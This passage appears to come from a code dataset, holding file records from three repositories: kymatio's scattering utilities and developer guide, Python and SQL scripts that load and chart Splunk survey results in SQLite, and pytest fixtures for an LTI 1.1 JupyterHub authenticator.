NaNs).\n - `'j'` : tensor\n A Tensor of size `(C, max_order)`, specifying the dyadic scale\n of the filter used at each order (padded with NaNs).\n - `'n'` : tensor\n A Tensor of size `(C, max_order)`, specifying the indices of\n the filters used at each order (padded with NaNs).\n - `'key'` : list\n The tuples indexing the corresponding scattering coefficient\n in the non-vectorized output.\n \"\"\"\n sigma_low, xi1s, sigma1s, j1s, xi2s, sigma2s, j2s = \\\n calibrate_scattering_filters(J, Q)\n\n meta = {}\n\n meta['order'] = [[], [], []]\n meta['xi'] = [[], [], []]\n meta['sigma'] = [[], [], []]\n meta['j'] = [[], [], []]\n meta['n'] = [[], [], []]\n meta['key'] = [[], [], []]\n\n meta['order'][0].append(0)\n meta['xi'][0].append(())\n meta['sigma'][0].append(())\n meta['j'][0].append(())\n meta['n'][0].append(())\n meta['key'][0].append(())\n\n for (n1, (xi1, sigma1, j1)) in enumerate(zip(xi1s, sigma1s, j1s)):\n meta['order'][1].append(1)\n meta['xi'][1].append((xi1,))\n meta['sigma'][1].append((sigma1,))\n meta['j'][1].append((j1,))\n meta['n'][1].append((n1,))\n meta['key'][1].append((n1,))\n\n if max_order < 2:\n continue\n\n for (n2, (xi2, sigma2, j2)) in enumerate(zip(xi2s, sigma2s, j2s)):\n if j2 > j1:\n meta['order'][2].append(2)\n meta['xi'][2].append((xi1, xi2))\n meta['sigma'][2].append((sigma1, sigma2))\n meta['j'][2].append((j1, j2))\n meta['n'][2].append((n1, n2))\n meta['key'][2].append((n1, n2))\n\n for field, value in meta.items():\n meta[field] = value[0] + value[1] + value[2]\n\n pad_fields = ['xi', 'sigma', 'j', 'n']\n pad_len = max_order\n\n for field in pad_fields:\n meta[field] = [x + (math.nan,) * (pad_len - len(x)) for x in meta[field]]\n\n array_fields = ['order', 'xi', 'sigma', 'j', 'n']\n\n for field in array_fields:\n meta[field] = 
np.array(meta[field])\n\n return meta\n"
},
{
"alpha_fraction": 0.7156786322593689,
"alphanum_fraction": 0.7199687957763672,
"avg_line_length": 36.159420013427734,
"blob_id": "3ec90d00f44c9f84e546d8a4583883c02641d78d",
"content_id": "1b639445983e38256884a15dc02f157eba42e3dd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 2564,
"license_type": "permissive",
"max_line_length": 200,
"num_lines": 69,
"path": "/doc/source/developerguide.rst",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": ".. _dev-guide:\n\nInformation for developers\n**************************\n\n(GitHub Workflow)\n=================\n\nKymatio implements the scattering transform for different frontends (currently ``numpy``, ``torch``, ``tensorflow``),\neach of which have one or more corresponding backends. This way, the generic scattering algorithm can be written in an\narchitecture-agnostic manner, since all low-level operations are relegated to the backend, and high-level operations\nspecific to an API are relegated to the frontend.\n\nTo make sure that a future pull request (PR) will pass the jenkins and travis tests, please try our package on the\nunit tests, the speed as well as the documentation. You might need to install auxiliary libraries via the\n``requirements_optional.txt``.\n\nFor development purposes, you might need to install the package via::\n\n git clone https://github.com/kymatio/kymatio.git\n git checkout origin/dev\n cd kymatio\n python setup.py develop\n\nPlease refer to `https://www.atlassian.com/git/tutorials/comparing-workflows/gitflow-workflow <https://www.atlassian.com/git/tutorials/comparing-workflows/gitflow-workflow>`_ for more recommendations.\n\nBackend to frontend: core of the algorithm\n==========================================\n\nCommon to the 1D, 2D and 3D scattering transform routines are four low-level functions which must be optimized:\n\n1. Fast Fourier transform (FFT) and its inverse (iFFT)\n2. Subsampling in the Fourier domain (periodization)\n3. Non-linearity (modulus in 1D and 2D, quadratic mean in 3D)\n4. Dotwise complex multiplication (``cdgmm``)\n5. Padding and unpadding\n\nChecking unit tests\n===================\n\nFor running all the unit tests and avoiding bugs, please first install the latest versions of ``numpy``, ``tensorflow``,\n``torch``, ``cupy``, ``scikit-cuda``. Then, run (in the root directory)::\n\n pytest\n\nIf all the tests pass, you may submit your pull request as explained below. A speed-test is welcome as well.\n\nChecking speed\n==============\n\nFor checking the speed of a given PR, run the ASV benchmarks on various architectures via::\n\n cd benchmarks\n run asv\n\nChecking documentation\n======================\n\nFor checking the documentation, please run the following commands, that will built it through sphinx::\n\n cd doc\n make clean\n make html\n\nProposing a pull request\n========================\n\nEach PR must be documented using docstrings, illustrated with an example and must pass the unit tests. Please check the\nPRs already merged on the GitHub repository if you need an example of a good PR.\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7840909361839294,
"avg_line_length": 40.06666564941406,
"blob_id": "bd745e0569f6d1e7931baa207122a564156b0384",
"content_id": "8a9d7bd68c76fcfdcb01e6841b623ffd43cc430c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 616,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 15,
"path": "/kymatio/torch.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.torch_frontend import ScatteringTorch1D as Scattering1D\nfrom .scattering2d.frontend.torch_frontend import ScatteringTorch2D as Scattering2D\nfrom .scattering3d.frontend.torch_frontend \\\n import HarmonicScatteringTorch3D as HarmonicScattering3D\n\nScattering1D.__module__ = 'kymatio.torch'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.torch'\nScattering2D.__name__ = 'Scattering2D'\n\nHarmonicScattering3D.__module__ = 'kymatio.torch'\nHarmonicScattering3D.__name__ = 'HarmonicScattering3D'\n\n__all__ = ['Scattering1D', 'Scattering2D', 'HarmonicScattering3D']\n"
}
] | 40 |
keroro824/splunksurvey_scripts
|
https://github.com/keroro824/splunksurvey_scripts
|
edbbfac4d50692f832bc4097de734feec40c0f95
|
34e24e6be922724adae3cfea5db0102f0c608eeb
|
a9935117ab93d7cd5687867d2a965b7ccdac2cfc
|
refs/heads/master
| 2020-06-12T11:18:21.884968 | 2014-03-30T23:27:40 | 2014-03-30T23:27:40 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5572693347930908,
"alphanum_fraction": 0.5689802765846252,
"avg_line_length": 36.63440704345703,
"blob_id": "539be81c73ce2c093b32d46f25dd6779dd240bc7",
"content_id": "07196e1e2437ab2cbea4604f63cc57786d5c82fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3501,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 93,
"path": "/scripts/db.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "import csv\nfrom contextlib import closing\nfrom sqlite3 import connect\n\nDATABASE = \"surveyresults.db\"\nSQLSCRIPT = \"scripts/surveyresults.sql\"\nQUESTIONS_CSV = \"data/CSV/Questions.csv\"\nQUESTION_OPT_CSV = \"data/CSV/QuestionOptions.csv\"\nRESPONDENTS_CSV = \"data/CSV/Respondents.csv\"\nRESPONSES_TEXT_CSV = \"data/CSV/ResponsesText.csv\"\nRESPONSES_CSV = \"data/CSV/Responses.csv\"\nQUESTION_OPT_LABEL_CSV = \"data/CSV/question_option_labels_for_graphing.csv\"\n\ndef init(script):\n execute_db_script(script)\n\ndef execute_db_script(script):\n with closing(connect_db()) as db:\n with open(script) as f:\n db.cursor().executescript(f.read())\n db.commit()\n\ndef connect_db():\n return connect(DATABASE)\n\ndef load(csvfile):\n db = connect_db()\n with open(csvfile, 'rU') as csvdata:\n csvreader = csv.reader(csvdata)\n first = True\n for row in csvreader:\n if first: # if there's a header -- a line with the column names in it -- skip it\n first = False\n continue\n insert_information(csvfile, db, *row) # assume row is a list containing three values, one for column1, one for column2, and one for column3\n db.close()\n\ndef insert_information(csvfile, db, *row):\n if csvfile == QUESTIONS_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO Questions \\\n (QuestionID, PageID, Position, QType, Heading) \\\n VALUES (?,?,?,?,?)\",\n [row[0], row[1], row[2], row[3], row[4]])\n db.commit()\n\n if csvfile == QUESTION_OPT_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO QuestionOptions \\\n (OptionID, OptionType, OptionNum, QuestionID, OptionText) \\\n VALUES (?,?,?,?,?)\",\n [unicode(row[0], errors='ignore'), unicode(row[1], errors='ignore'), unicode(row[2], errors='ignore'), unicode(row[3], errors='ignore'), unicode(row[4], errors='ignore')]) \n db.commit() \n\n if csvfile == RESPONSES_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO Responses \\\n (RespondentID, CollectorID, QuestionID, Key1, Key2, Key3, DateAdded) \\\n VALUES (?,?,?,?,?,?,?)\",\n [row[0], row[1], row[2], row[3], row[4], row[5], row[6]])\n db.commit()\n\n if csvfile == RESPONDENTS_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO Respondents \\\n (RespondentID, CollectorID, IPAddress, Email, FirstName, LastName, CustomData, DateAdded) \\\n VALUES (?,?,?,?,?,?,?,?)\",\n [row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7]])\n db.commit() \n\n if csvfile == RESPONSES_TEXT_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO ResponsesText \\\n (RespondentID, CollectorID, QuestionID, Key1, ResponsesText, DateAdded) \\\n VALUES (?,?,?,?,?,?)\",\n [row[0], row[1], row[2], row[3], row[4], row[5]])\n db.commit()\n\n if csvfile == QUESTION_OPT_LABEL_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO OptionLabel \\\n (OptionID, OptionLabel) \\\n VALUES (?,?)\",\n [row[0], row[1]])\n db.commit()\n\ninit(SQLSCRIPT)\nload(QUESTIONS_CSV)\nload(QUESTION_OPT_CSV)\nload(RESPONDENTS_CSV)\nload(RESPONSES_CSV)\nload(RESPONSES_TEXT_CSV)\nload(QUESTION_OPT_LABEL_CSV)\n\n"
},
{
"alpha_fraction": 0.7556623220443726,
"alphanum_fraction": 0.7755662202835083,
"avg_line_length": 19.23611068725586,
"blob_id": "3d6410063ba8badb709106d72005f31af377df79",
"content_id": "b549c4833f9baa7b4378c3434bb9f47c0d90aee4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1458,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 72,
"path": "/scripts/surveyresults.sql",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "DROP TABLE IF EXISTS Questions;\nDROP TABLE IF EXISTS QuestionOptions;\nDROP TABLE IF EXISTS Responses;\nDROP TABLE IF EXISTS Respondents;\nDROP TABLE IF EXISTS ResponsesText ;\nDROP TABLE IF EXISTS OptionLabel;\n\nCREATE TABLE Questions(\n\tQuestionID INT,\n\tPageID INT,\n\tPosition INT,\n\tQType INT,\n\tHeading VARCHAR(255),\n\tPRIMARY KEY (QuestionID)\n);\n\nCREATE TABLE QuestionOptions(\n\tOptionID INT,\n\tOptionType INT,\n\tOptionNum INT,\n\tQuestionID INT,\n\tOptionText VARCHAR(255),\n\tPRIMARY KEY (OptionID),\n\tFOREIGN KEY (QuestionID)\n\t\tREFERENCES Questions(QuestionID)\n);\n\nCREATE TABLE Responses(\n\tRespondentID INT,\n\tCollectorID INT,\n\tQuestionID INT,\n\tKey1 INT,\n\tKey2 INT,\n\tKey3 INT,\n\tDateAdded TIMESTAMP,\n\tFOREIGN KEY (RespondentID)\n\t\tREFERENCES Respondents(RespondentID),\n\tFOREIGN KEY (QuestionID)\n\t\tREFERENCES Questions(QuestionID)\t\n);\n\nCREATE TABLE Respondents(\n\tRespondentID INT,\n\tCollectorID INT,\n\tIPAddress VARCHAR(255),\n\tEmail VARCHAR(255),\n\tFirstName VARCHAR(255),\n\tLastName VARCHAR(255),\n\tCustomData VARCHAR(255),\n\tDateAdded TIMESTAMP,\n\tPRIMARY KEY (RespondentID)\n);\n\nCREATE TABLE ResponsesText(\n\tRespondentID INT,\n\tCollectorID INT,\n\tQuestionID INT,\n\tKey1 INT,\n\tResponsesText VARCHAR(255),\n\tDateAdded TIMESTAMP,\n\tFOREIGN KEY (RespondentID)\n\t\tREFERENCES Respondents(RespondentID),\n\tFOREIGN KEY (QuestionID)\n\t\tREFERENCES Questions(QuestionID),\n\tFOREIGN KEY (Key1)\n\t\tREFERENCES QuestionOptions(OptionID)\n);\n\nCREATE TABLE OptionLabel(\n\tOptionID INT,\n\tOptionLabel TEXT\n);\n"
},
{
"alpha_fraction": 0.5688775777816772,
"alphanum_fraction": 0.5758928656578064,
"avg_line_length": 35.44186019897461,
"blob_id": "fa0562edfdfb663d7ee2ef29d0e40e7a868f81f3",
"content_id": "347c1d1633ffead0ad5317b88bc2e21fb1381006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1568,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 43,
"path": "/scripts/response_categories_by_question.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport sqlite3\nfrom collections import defaultdict\n\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n\n cur.execute(\"SELECT QuestionID FROM Questions WHERE QType = 40;\") # TODO: Other question types?\n question_ids = [r[0] for r in cur.fetchall()]\n \n questions = {}\n for id in question_ids:\n\n # For each question, get count of responses and response labels.\n cur.execute(\"SELECT RespondentID, ColumnLabel, RowLabel \\\n FROM \\\n ( SELECT OptionID as K3, OptionLabel as ColumnLabel \\\n FROM QuestionOptions ), \\\n ( SELECT OptionID as K1, OptionLabel as RowLabel \\\n FROM QuestionOptions ), \\\n Responses \\\n WHERE Responses.QuestionID=? \\\n AND Responses.Key3=K3 \\\n AND Responses.Key1=K1\", [id])\n\n respondents = {}\n responses = cur.fetchall()\n for (respondent, column_label, row_label) in responses:\n if not respondent in respondents:\n respondents[respondent] = defaultdict(list)\n respondents[respondent][column_label].append(row_label)\n \n questions[id] = respondents\n\n for (id, all_answers) in questions.iteritems():\n for (respondent, customers) in all_answers.iteritems():\n for (customer, answers) in customers.iteritems():\n print id, respondent, customer, answers\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6318055987358093,
"alphanum_fraction": 0.6496462821960449,
"avg_line_length": 30.52427101135254,
"blob_id": "3046d730735476ab46170eda0a3f8c3e43eb6ce3",
"content_id": "64c11faa0f8274daaeb953d1e4471a9d8d9bec5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3251,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 103,
"path": "/scripts/plot_data.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport copy\nimport math\nimport os\nimport sqlite3\nimport textwrap\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nfrom matplotlib import pyplot as mpl\nfrom numpy import argsort, linspace\n\ndef plot_vertical_bar(id, response_count, response_label):\n\tN = len(response_count)\n\tind = np.arange(N)\n\twidth = 0.25\n\tmaxcount = max(response_count)\n\n\tfig, ax = plt.subplots()\n\tplt.subplots_adjust(bottom=.5, left=.6)\n\trects = ax.bar(ind+width, response_count, width, color=\"black\", align=\"center\")\n\n\tax.set_ylabel(\"Number of customers (n=39)\")\n\tax.set_ymargin(1)\n\tax.set_ylim(top=((maxcount/10+1)*10))\n\n\tax.set_xticks(ind+width)\n\tplt.xticks(rotation=90)\n\tax.set_xticklabels(response_label, multialignment=\"right\")\n\n\t# Add numeric labels on top of bars.\n\tfor rect in rects:\n\t\theight = rect.get_height()\n\t\tax.text(rect.get_x()+rect.get_width()/2., 1.05*height, '%d'%int(height),\n\t\t\t\tha=\"center\", va=\"bottom\")\n\n\tplt.savefig(\"\".join([\"pic/\", str(id), \".png\"]))\n\tplt.close()\n\ndef plot_horizontal_bar(id, response_count, response_label):\n\tmax_count = max(response_count)\n\typos = np.arange(len(response_label))\n\t\n\tfig, ax = plt.subplots()\n\trects = plt.barh(ypos, response_count, align=\"center\", color=\"black\", height=.25)\n\n\tplt.yticks(ypos, response_label)\n\tplt.xlim(xmax=((max_count/10+1)*10))\n\tplt.rcParams.update({'font.size': 10})\n\tplt.xlabel(\"Number of customers (n=39)\")\n\tif id==528410987:\n\t\tplt.subplots_adjust(left=.4)\n\telse:\n\t\tplt.subplots_adjust(left=.3)\n\t\n\tfor rect in rects:\n\t\twidth = rect.get_width()\n\t\tax.text(width+.5, rect.get_y()+rect.get_height()/2., '%d'%int(width),\n\t\t\t\tha=\"left\", va=\"center\")\n\n\tplt.savefig(\"\".join([\"pic/\", str(id), \".png\"]))\n\tplt.close()\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n\n cur.execute(\"SELECT QuestionID FROM Questions WHERE QType = 40;\") # TODO: Other question types?\n question_ids = [r[0] for r in cur.fetchall()]\n\n iteration = 0\n for id in question_ids:\n\n # For each question, get count of responses and response labels.\n cur.execute((\"SELECT Questions.Heading, count(*), QuestionOptions.OptionLabel, QuestionOptions.OptionText, Questions.QuestionID \\\n FROM Questions, QuestionOptions, Responses \\\n WHERE Questions.QuestionID=? AND QuestionOptions.QuestionID=? AND QuestionOptions.OptionID=Responses.Key1 \\\n GROUP BY Questions.QuestionID, QuestionOptions.OptionID;\"), [id, id])\n \n responses = cur.fetchall()\n responses = sorted(responses, key=lambda x: x[1])\n \n # Debugging information to compare to SurveyMonkey counts\n print iteration, responses[0][4], responses[0][0]\n print r\"\\begin{itemize}\"\n for (heading, count, label, text, id) in responses:\n #print label, count, text\n print r\"\\item\", text\n print r\"\\end{itemize}\"\n print \n \n response_count = [r[1] for r in responses]\n response_label = [r[2] for r in responses]\n\n # Plot responses.\n #plot_vertical_bar(id, response_count, response_label)\n plot_horizontal_bar(id, response_count, response_label)\n iteration += 1\n\nif __name__ == \"__main__\":\n\tmain()\n\n\t\n"
},
{
"alpha_fraction": 0.6038415431976318,
"alphanum_fraction": 0.609843909740448,
"avg_line_length": 28.714284896850586,
"blob_id": "96c0ef10e6ba3c7e369e3ec07e21cb088044326a",
"content_id": "21a88644a3352974c165bbf81bd26542f35a32f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 833,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 28,
"path": "/scripts/print_writein_responses.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport sys\nimport sqlite3\nfrom collections import defaultdict\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n \n cur.execute(\"SELECT RespondentID, ResponsesText.QuestionID, Key1, ResponsesText \\\n FROM ResponsesText, Questions \\\n WHERE ResponsesText.QuestionID=Questions.QuestionID \\\n AND (Questions.QType=40)\")\n\n rows = cur.fetchall()\n questions = defaultdict(list)\n for (respondent, question, key, text) in rows:\n questions[question].append(text)\n \n\n for (question, text_list) in questions.iteritems():\n print question\n print r\"\\squishitem\"\n print \"\\n\".join([\"\\item \" + s for s in text_list])\n print r\"\\squishend\"\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5532969832420349,
"alphanum_fraction": 0.5624690055847168,
"avg_line_length": 35.33333206176758,
"blob_id": "acd9920f08de528b421c13f2d605aebeaea8d036",
"content_id": "8fccada53d8f2d6d6db21dce661f46857c0b1b2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4034,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 111,
"path": "/scripts/customer_profiles.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport sys\nimport sqlite3\nfrom collections import defaultdict\n\ndef print_customers(customers, question_headings):\n num = 1\n for (name, question) in customers.iteritems():\n name = name.replace(\" \", \"\")\n print r\"\"\"\n\\begin{table}[H]\n\\begin{footnotesize}\n\\begin{center}\n\\begin{tabular}{|p{.6\\textwidth}|p{.4\\textwidth}|} \\hline\n\\textit{Question} & \\textit{Answer} \\\\ \\hline\n \"\"\"\n for (id, answers) in question.iteritems():\n sys.stdout.write(\"%s & %s \\\\\\\\ \\\\hline \\n\" % (question_headings[id], \"; \".join(answers)))\n #print question_headings[id]\n #print answers\n print r\"\"\"\n\\end{tabular}\n\\end{center}\n\\label{tab:%s}\n\\caption{Customer %d}\n\\end{footnotesize}\n\\end{table}\n \"\"\" % (name, num)\n print\n num += 1\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n\n cur.execute(\"SELECT QuestionID FROM Questions WHERE QType = 40;\") # TODO: Other question types?\n question_ids = [r[0] for r in cur.fetchall()]\n \n cur.execute(\"SELECT QuestionID, Heading from Questions\")\n question_headings = dict(cur.fetchall())\n\n questions = {}\n for id in question_ids:\n\n # For each question, get count of responses and response labels.\n cur.execute(\"SELECT RespondentID, ColumnLabel, RowLabel \\\n FROM \\\n ( SELECT OptionID as K3, OptionLabel as ColumnLabel \\\n FROM QuestionOptions ), \\\n ( SELECT OptionID as K1, OptionLabel as RowLabel \\\n FROM QuestionOptions ), \\\n Responses \\\n WHERE Responses.QuestionID=? \\\n AND Responses.Key3=K3 \\\n AND Responses.Key1=K1\", [id])\n\n respondents = {}\n responses = cur.fetchall()\n for (respondent, column_label, row_label) in responses:\n if not respondent in respondents:\n respondents[respondent] = defaultdict(list)\n respondents[respondent][column_label].append(row_label)\n \n questions[id] = respondents\n\n cur.execute(\"SELECT RespondentID, ResponsesText.QuestionID, Key1, ResponsesText \\\n FROM ResponsesText, Questions \\\n WHERE ResponsesText.QuestionID=Questions.QuestionID \\\n AND (Questions.QType=100 OR Questions.QType=80)\")\n\n q = {}\n rows = cur.fetchall()\n for (respondent, question, key, text) in rows:\n if not question in q:\n q[question] = {}\n if not respondent in q[question]:\n q[question][respondent] = []\n q[question][respondent].append((key, text))\n\n for (id, question) in q.iteritems():\n if not id in questions:\n questions[id] = {}\n for (respondent, answers) in question.iteritems():\n answers = sorted(answers, key=lambda x: x[0])\n num = 1\n for (key, text) in answers:\n if not respondent in questions[id]:\n questions[id][respondent] = {}\n questions[id][respondent][\"Customer \"+str(num)] = [text]\n num += 1\n\n print questions[528408871]\n\n customers = {}\n for (id, all_answers) in questions.iteritems():\n for (respondent, three_customers) in all_answers.iteritems():\n for (customer, answers) in three_customers.iteritems():\n cur.execute(\"SELECT ResponsesText FROM ResponsesText \\\n WHERE Key1=0 AND QuestionID=? AND RespondentID=?\", [id, respondent])\n addl_info = cur.fetchall()\n name = '-'.join([str(respondent), customer])\n if not name in customers:\n customers[name] = {}\n if len(addl_info) > 0:\n answers = answers + [a[0] for a in addl_info]\n customers[name][id] = answers\n\n print_customers(customers, question_headings)\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5153061151504517,
"alphanum_fraction": 0.5725623369216919,
"avg_line_length": 26.546875,
"blob_id": "a3799e3459c8ac643c3e0851080d9d4cd1354680",
"content_id": "0a347340d3f02ff7272dbe2d36b232bf480b20ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1764,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 64,
"path": "/scripts/print_other_question_responses.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport sys\nimport sqlite3\nfrom collections import defaultdict\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n \n cur.execute(\"SELECT ResponsesText FROM ResponsesText WHERE QuestionID=528408871\")\n responses = cur.fetchall()\n print r\"\\squishitem\"\n for (response,) in responses:\n print r\"\\item\", response\n print r\"\\squishend\"\n \n cur.execute(\"SELECT ResponsesText FROM ResponsesText WHERE QuestionID=528408904\")\n values = [int(r[0]) for r in cur.fetchall()]\n\n d = {}\n d[\"0-9\"] = 0\n d[\"10-99\"] = 0\n d[\"100-999\"] = 0\n d[\"1000+\"] = 0\n\n for value in values:\n if value >= 0 and value <= 9:\n d[\"0-9\"] += 1\n if value >= 10 and value <= 99:\n d[\"10-99\"] += 1\n if value >= 100 and value <= 999:\n d[\"100-999\"] += 1\n if value >= 1000:\n d[\"1000+\"] += 1\n\n d = sorted(d.items(), key=lambda x: x[0])\n response_count = [i[1] for i in d]\n print response_count\n response_label = [i[0] for i in d]\n\n max_count = max(response_count)\n ypos = np.arange(len(response_label))\n \n fig, ax = plt.subplots()\n rects = plt.barh(ypos, response_count, align=\"center\", color=\"black\", height=.25)\n\n plt.yticks(ypos, response_label)\n plt.xlim(xmax=((max_count/10+1)*10))\n plt.xlabel(\"Number of customers (n=42)\")\n plt.subplots_adjust(left=.3)\n \n for rect in rects:\n width = rect.get_width()\n ax.text(width+.5, rect.get_y()+rect.get_height()/2., '%d'%int(width),\n ha=\"left\", va=\"center\")\n\n plt.savefig(\"\".join([\"figs/528408904.png\"]))\n plt.close()\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 7 |
shurrey/ltiauthenticator
|
https://github.com/shurrey/ltiauthenticator
|
c769fa2f464026e5f95f8bbd1e32aba2ace2dc4c
|
87657e17480b7e776cfbfd9ba5404d7bd9cdf7aa
|
7c5cc73b6dd36be25e7c9b2f8b5570227860c031
|
refs/heads/master
| 2023-06-26T23:30:11.103573 | 2021-07-24T04:10:12 | 2021-07-24T04:10:12 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6777087450027466,
"alphanum_fraction": 0.7025535106658936,
"avg_line_length": 34.34146499633789,
"blob_id": "1609f55645708fe9ddf2bbf46c610104542d57c3",
"content_id": "4719200d2cf8041b3285b337249a642d772e7b8a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1449,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 41,
"path": "/tests/test_lti11_handlers.py",
"repo_name": "shurrey/ltiauthenticator",
"src_encoding": "UTF-8",
"text": "from unittest.mock import patch\n\nimport pytest\n\nfrom ltiauthenticator.lti11.handlers import LTI11AuthenticateHandler\n\n\[email protected]\nasync def test_lti_11_authenticate_handler_invokes_redirect_method(\n make_lti11_mock_request_handler,\n):\n \"\"\"\n Does the LTI11AuthenticateHandler call the redirect function?\n \"\"\"\n local_handler = make_lti11_mock_request_handler(LTI11AuthenticateHandler)\n with patch.object(\n LTI11AuthenticateHandler, \"redirect\", return_value=None\n ) as mock_redirect:\n with patch.object(LTI11AuthenticateHandler, \"login_user\", return_value=None):\n await LTI11AuthenticateHandler(\n local_handler.application, local_handler.request\n ).post()\n assert mock_redirect.called\n\n\[email protected]\nasync def test_lti_11_authenticate_handler_invokes_login_user_method(\n make_lti11_mock_request_handler,\n):\n \"\"\"\n Does the LTI11AuthenticateHandler call the login_user function?\n \"\"\"\n local_handler = make_lti11_mock_request_handler(LTI11AuthenticateHandler)\n with patch.object(LTI11AuthenticateHandler, \"redirect\", return_value=None):\n with patch.object(\n LTI11AuthenticateHandler, \"login_user\", return_value=None\n ) as mock_login_user:\n await LTI11AuthenticateHandler(\n local_handler.application, local_handler.request\n ).post()\n assert mock_login_user.called\n"
},
{
"alpha_fraction": 0.5528912544250488,
"alphanum_fraction": 0.5869665145874023,
"avg_line_length": 41.51707458496094,
"blob_id": "769bb8a74f954447fd6722246d722b7c4ba40120",
"content_id": "5daf4db7008be38f241031860cea081f88412e31",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8716,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 205,
"path": "/tests/conftest.py",
"repo_name": "shurrey/ltiauthenticator",
"src_encoding": "UTF-8",
"text": "import os\nimport secrets\nimport time\n\nfrom oauthlib.oauth1.rfc5849 import signature\n\nimport pytest\n\nfrom typing import Dict\n\nfrom tornado.web import Application\nfrom tornado.web import RequestHandler\nfrom tornado.httputil import HTTPServerRequest\n\nfrom unittest.mock import Mock\n\n\[email protected](scope=\"function\")\ndef user_model(username: str, **kwargs) -> dict:\n \"\"\"Return a user model\"\"\"\n user = {\n \"username\": username,\n \"auth_state\": {k: v for k, v in kwargs.items() if not k.startswith(\"oauth_\")},\n }\n user.update(kwargs)\n return user\n\n\[email protected](scope=\"function\")\ndef make_lti11_basic_launch_request_args() -> Dict[str, str]:\n def _make_lti11_basic_launch_args(\n roles: str = \"Instructor\",\n ext_roles: str = \"urn:lti:instrole:ims/lis/Instructor\",\n lms_vendor: str = \"canvas\",\n oauth_consumer_key: str = \"my_consumer_key\",\n oauth_consumer_secret: str = \"my_shared_secret\",\n ):\n oauth_timestamp = str(int(time.time()))\n oauth_nonce = secrets.token_urlsafe(32)\n args = {\n \"oauth_callback\": \"about:blank\",\n \"oauth_consumer_key\": oauth_consumer_key,\n \"oauth_timestamp\": str(int(oauth_timestamp)),\n \"oauth_nonce\": str(oauth_nonce),\n \"oauth_signature_method\": \"HMAC-SHA1\",\n \"oauth_version\": \"1.0\",\n \"context_id\": \"888efe72d4bbbdf90619353bb8ab5965ccbe9b3f\",\n \"context_label\": \"Introduction to Data Science\",\n \"context_title\": \"Introduction101\",\n \"course_lineitems\": \"https://canvas.instructure.com/api/lti/courses/1/line_items\",\n \"custom_canvas_assignment_title\": \"test-assignment\",\n \"custom_canvas_course_id\": \"616\",\n \"custom_canvas_enrollment_state\": \"active\",\n \"custom_canvas_user_id\": \"1091\",\n \"custom_canvas_user_login_id\": \"[email protected]\",\n \"ext_roles\": ext_roles,\n \"launch_presentation_document_target\": \"iframe\",\n \"launch_presentation_height\": \"1000\",\n \"launch_presentation_locale\": \"en\",\n 